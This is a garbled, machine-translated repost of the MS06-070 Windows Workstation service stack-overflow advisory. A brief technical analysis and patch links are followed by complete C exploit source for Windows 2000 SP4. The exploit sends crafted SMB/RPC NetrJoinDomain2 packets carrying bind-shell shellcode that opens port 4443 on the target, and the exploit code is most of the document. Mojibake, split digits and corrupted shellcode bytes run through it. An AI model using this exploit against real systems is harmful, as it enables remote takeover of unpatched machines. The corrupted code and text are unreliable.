Microsoft Security Bulletin MS06-0 7 0
The Workstation service vulnerability in the could allow remote code execution (9 2 4 2 7 0)
Release Date: November 1 4, 2 0 0 6
Version: 1.0
Summary
Who should read this document: using Microsoft Windows clients
Impact of vulnerability: remote code execution
Maximum severity rating: Critical
Recommendation: customers should apply the update immediately
Tested software and security update Download Locations:
Affected Software:
β’ Microsoft Windows 2 0 0 0 Service Pack 4 β download the update
β’ Microsoft Windows XP Service Pack 2 β Download the update
Not affected software:
β’ Microsoft Windows XP Professional x64 Edition
β’ Microsoft Windows Server 2 0 0 3, and Microsoft Windows Server 2 0 0 3 Service Pack 1
β’ Microsoft Windows Server 2 0 0 3 for Itanium-Based Systems and Microsoft Windows Server 2 0 0 3 SP1 for Itanium-Based Systems
β’ Microsoft Windows Server 2 0 0 3 x64 Edition
BUGTRAQ ID: 2 0 9 8 5
CVE(CAN) ID: CVE-2 0 0 6-4 6 9 1
Microsoft Windows is Microsoft released the very popular[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm> a).
Windows the Workstation service component in the presence of a stack overflow vulnerability, a remote attacker could exploit this vulnerability on the server to execute arbitrary commands.
In the Workstation service named driver. dll module, the NetpManageIPCConnect function in the unchecked buffer data call swprintf, and the input buffer is a remote attacker controllable.
. text:76781D67 mov edi, [ebp+arg_0]
β¦
. text:76781D90 lea eax, [ebp+var_2CC]
β¦
. text:76781DA0 push edi
. text:76781DA1 push offset β%ws\\IPC$β
. text:76781DA6 push eax
. text:76781DA7 call ds:swprintf
NetpJoinDomain call this function, and ultimately by the NetrJoinDomain2 function through RPC calls.
NetrJoinDomain2 IDL like this:
long _NetrJoinDomain2@2 8 (
[in][unique][string] wchar_t * arg_1,
[in][string] wchar_t * arg_2,
[in][unique][string] wchar_t * arg_3,
[in][unique][string] wchar_t * arg_4,
[in][unique] struct_C * arg_5,
[in] long arg_6
);
arg_2 contains a format similar to the<Domain name>+""+<Hostname>of the string.
<Hostname>will be used as NetpManageIPCConnectβs first argument. This variable is attacker controlled, and ultimately transmitted to swprintf, leading to stack overflow.
<*source: JeongWook Matt Oh
Derek Soeder οΌ[email protected]οΌ
Links: http://secunia.com/advisories/22883
http://research.eeye.com/html/advisories/published/AD20061114.html
http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx
http://www.us-cert.gov/cas/techalerts/TA06-318A.html
*>
Recommendations:
Temporary workaround:
Manufacturers patch:
Microsoft
---------
Microsoft has released a security Bulletin MS06-0 7 0, and the corresponding patch:
MS06-0 7 0: a Vulnerability in Workstation Service Could Allow Remote Code Execution (9 2 4 2 7 0)
Links: http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx
Patch download:
http://www.microsoft.com/downloads/details.aspx?FamilyId=3ad5c57d-d3f6-46a1-8dee-3e16d0977f80
http://www.microsoft.com/downloads/details.aspx?FamilyId=f4c8e767-4ed2-4e36-aa43-612f3017efc7
Use code:
The CODE:
/***************************************************************************
Microsoft Windows Driver NetrJoinDomain2 Stack Overflow(MS06-0 7 0) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:<http://ruder.cdut.net/default.asp>
Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct the jmp EBX address and fixed the Trojan output status.
Greetz to InTel
Should work on Windows 2 0 0 0 Server SP4 (All Languages)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
<http://research.eeye.com/html/advisories/published/AD20061114.html>,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include <stdio. h>
#include <windows. h>
#include <winsock. h>
#include <tchar. h>
#pragma comment(lib, βwsock32. libβ)
unsigned char SmbNeg[] =
β\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00β
β\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54β
β\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00β;
unsigned char Session_Setup_AndX_Request[]=
β\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00β
β\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xffβ
β\xff\x02\x00\x8 8\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6dβ
β\x62\x00β;
unsigned char TreeConnect_AndX_Request[]=
β\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00β
β\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08β
β\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00β
β\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00β
β\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3fβ
β\x3f\x00β;
unsigned char NTCreate_AndX_Request[]=
β\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00β
β\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00β
β\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00β
β\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00β
β\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00β
β\x77\x00\x6b\x00\x73\x00\x73\x00\x 76\x00\x63\x00\x00\x00β;
unsigned char Rpc_Bind_Wkssvc[]=
β\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00β
β\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00β
β\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4aβ
β\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49β
β\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00β
β\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00β
β\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3β
β\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11β
β\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00β;
unsigned char Rpc_NetrJoinDomain2_Header[]=
β\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00β
β\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00β
β\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00β
β\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54β
β\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00β
β\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00β
β\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00β
β\x00\x00\x00\x00β
β\x16\x00β //opnum,NetrJoinDomain2
β\x30\x2a\x42\x00β
β\x0e\x00\x00\x00β
β\x00\x00\x00\x00β
β\x0e\x00\x00\x00β
β\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00β
β\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00β
β\x00\x00β
β\x10\x01\x00\x00β
β\x00\x00\x00\x00β
β\x10\x01\x00\x00β;
unsigned char Rpc_NetrJoinDomain2_End[]=
β\x00\x00\x00\x00β
β\x00\x00\x00\x00β
β\x00\x00\x00\x00β
β\x01\x00\x00\x00β;
unsigned char *lpDomainName=NULL;
DWORD dwDomainNameLen=0;
/* win32_bind - EXITFUNC=seh LPORT=4 4 4 3 Size=3 4 4 Encoder=PexFnstenvSub <http://metasploit.com> */
unsigned char shellcode[] =
β\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9β
β\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31β
β\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45β
β\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\the XE3\x57β
β\x45\xdd\the XE3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6β
β\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25β
β\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45β
β\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9eβ
β\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1eβ
β\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xccβ
β\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9dβ
β\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2fβ
β\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6β
β\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87β
β\xbe\xa6\xf5\x9e\xbd\x0d\x 76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99β
β\x16\x8f\x 76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9eβ
β\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\the XE3\x3d\x43\xa7\x61\the XE3β
β\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31β
β\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x 76\x9fβ
β\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1eβ
β\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91β
β\xba\xa6\xf5\x31\x39\x59\x23\xceβ;
DWORD fill_len_1 =0x84c; //fill data
DWORD fill_len_2 =0x1000; //fill rubbish data
DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[]= //jmp 8
β\xEB\x06\x90\x90β;
unsigned char *Rpc_NetrJoinDomain2=NULL;
DWORD dwRpc_NetrJoinDomain2=0;
unsigned char recvbuff[2 0 4 8];
void showinfo(void)
{
printf(βMicrosoft Windows Driver NetrJoinDomain2 Stack Overflow(MS06-0 7 0) Exploit\nβ);
printf(βby cocoruder(frankruder_at_hotmail.com),2006.10.15\nβ);
printf(βpage:<http://ruder.cdut.net/default.asp>\n\nβ);
printf(βCode fixed by S A Stevens - 16.11.2006\nβ);
printf(βShould work on Windows 2 0 0 0 Server SP4 (All Languages)\n\nβ);
printf(βusage:\nβ);
printf(βms06070 targetip DomainName\n\nβ);
printf(βnotice:\nβ);
printf(βMake sure the DomainName is valid and live,more informations see\nβ);
printf(β<http://research.eeye.com/html/advisories/published/AD20061114.html>,\nβ);
printf(βcocoruder just research the vulnerability and give the exploit for Win2000.\ n\n\nβ);
}
void neg ( int s )
{
char response[1 0 2 4];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}
void MakeAttackPacket(char *lpDomainNameStr)
{
DWORD j,len,b_flag;
dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
memset(lpDomainName,0,dwDomainNameLen);
MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
*(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
*(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
len=dwDomainNameLen+ //DomainName
fill_len_1-3*2+ //fill_len_1
4+ //jmp 8
4+ //addr jmp ebx
sizeof(shellcode)-1+ //shellcode
fill_len_2+ //fill_len_2
2; //0x0000
b_flag=0;
if (len%2==1)
{
len++;
b_flag=1;
}
dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
len+
sizeof(Rpc_NetrJoinDomain2_End)-1; //end
//malloc
Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
if (Rpc_NetrJoinDomain2==NULL)
{
printf(βmalloc error!\ nβ);
return;
}
//fill the nop
memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//update para1 length
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
//copy header
memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//copy the DomainName
memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
j=j+dwDomainNameLen;
//calculate offset
j=j+fill_len_1-3*2;
//jmp 8
memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
j=j+4;
//jmp ebx address
*(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
j=j+4;
//copy shellcode
memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
j=j+sizeof(shellcode)-1;
//fill data
memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
j=j+fill_len_2;
//0x0000(NULL)
if (b_flag==0)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
j=j+2;
}
else if (b_flag==1)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
Rpc_NetrJoinDomain2[j+2]=0x00;
j=j+3;
}
//copy other parameter
memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
}
void main(int argc,char **argv)
{
WSADATA ws;
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WORD userid,treeid,fid;
WSAStartup(MAKEWORD(2,2),&ws);
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}
server. sin_family = AF_INET;
server. sin_addr. server_address = inet_addr(argv[1]);
server. sin_port = htons((USHORT)4 4 5);
printf(β[+] Connecting %s\nβ,argv[1]);
ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf(βConnection Error, Port 4 4 5 Firewalled?\ nβ);
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf(βsend Session_Setup_AndX_Request error!\ nβ);
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(WORD *)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf(βsend TreeConnect_AndX_Request error!\ nβ);
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(WORD *)(recvbuff+0x1c); //get treeid
//send NTCreate_AndX_Request
memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid
ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
if (ret<=0)
{
printf(βsend NTCreate_AndX_Request error!\ nβ);
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
fid=*(WORD *)(recvbuff+0x2a); //get the fid
//rpc bind
memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
*(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
if (ret<=0)
{
printf(βsend Rpc_Bind_Wkssvc error!\ nβ);
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
MakeAttackPacket((char *)argv[2]);
memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
*(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
*(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update the Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
*(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length
ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
if (ret<=0)
{
printf(βsend Rpc_NetrJoinDomain2 error!\ nβ);
return;
}
printf(β[+] Sent attack packet successfully, Try telnet on %s:4443?\nβ,argv[1]);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
closesocket(sock);
}
// milw0rm.com [2006-11-17]